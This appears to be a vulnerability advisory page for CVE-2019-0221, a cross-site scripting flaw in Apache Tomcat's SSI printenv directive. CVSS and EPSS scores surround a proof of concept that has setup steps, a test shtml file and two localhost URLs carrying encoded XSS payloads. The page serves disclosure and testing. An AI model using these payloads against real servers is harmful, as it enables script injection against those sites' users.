6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
7.3 High
AI Score
Confidence
High
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.009 Low
EPSS
Percentile
82.4%
# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221
# Requirements:
# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.
# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.
# The file must be accessible.
# Proof of Concept:
# Install a Java Runtime Environment (JRE)
# Download a vulnerable version of Tomcat and extract the contents
# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">
# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide
# Put the following code in "webapps/ROOT/ssi/printenv.shtml"
<html>
<body>
Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/>
Printenv: <!-- #printenv -->
</body>
</html>
# Run Tomcat
cd bin
catalina run
# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
7.3 High
AI Score
Confidence
High
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.009 Low
EPSS
Percentile
82.4%